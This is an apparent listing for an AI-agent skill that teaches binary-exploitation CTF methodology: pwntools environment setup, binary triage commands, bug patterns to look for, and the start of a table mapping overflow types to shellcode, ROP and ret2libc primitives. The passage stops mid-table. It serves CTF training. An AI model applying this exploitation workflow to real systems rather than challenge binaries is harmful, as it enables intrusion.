ctf-pwnlisted

Use when solving binary exploitation / pwn CTF challenges — buffer overflows, ROP, format strings, heap, kernel pwn. Provides a decision tree, exploit primitive catalog, and uses pwntools via the run_script(venv="pwntools") MCP path. Triggers on "ctf pwn", "binary exploit", "rop", "buffer overflow", "format string", "heap challenge".
26zl/cybersec-toolkit · ★ 6 · AI & Automation · score 73

Install: claude install-skill 26zl/cybersec-toolkit

# CTF pwn methodology ## 0. Pwntools venv The MCP server runs pwntools through a dedicated venv at `~/.ctf-venvs/pwntools/`. If missing: ```bash wsl.exe bash -lc "mkdir -p ~/.ctf-venvs && python3 -m venv ~/.ctf-venvs/pwntools && ~/.ctf-venvs/pwntools/bin/pip install pwntools z3-solver" ``` Then use it: `run_script(code, venv="pwntools")`. ## 1. Identify the binary ```bash file ./vuln checksec --file=./vuln # or: rabin2 -I ./vuln strings ./vuln | head -50 nm ./vuln | head -30 # symbols if not stripped ``` Note: `RELRO`, `Canary`, `NX`, `PIE`, arch (x86 / x86_64 / arm / mips), libc version. If a libc is provided, identify it: ```bash strings libc.so.6 | grep "GNU C Library" # or ./vuln_pwntools_helper # see below ``` `libc-database` and `libc-rip`/`libc.rip` (web) — find offsets by leaked function addresses. ## 2. Find the bug Static: - `objdump -d -M intel ./vuln` - Ghidra / `cutter` (radare2 GUI) for decompile — both in registry - Look for: `gets`, `strcpy`, unbounded `read`, `printf(user_input)`, integer overflow on size, double free, UAF Dynamic: - `gdb-multiarch ./vuln` + `pwndbg` / `gef` - Cyclic pattern: `cyclic 200` → run → crash → `cyclic -l <RIP>` to find offset ## 3. Pick the primitive | Class | Primitive | Tool | | --- | --- | --- | | Stack BOF, no canary, NX off | shellcode | `pwntools shellcraft.sh()` | | Stack BOF, NX on, ASLR off | ret2win / static ROP | `ROPgadget --binary ./vuln` | | Stack BOF, NX+ASLR, libc leak | ret2libc | l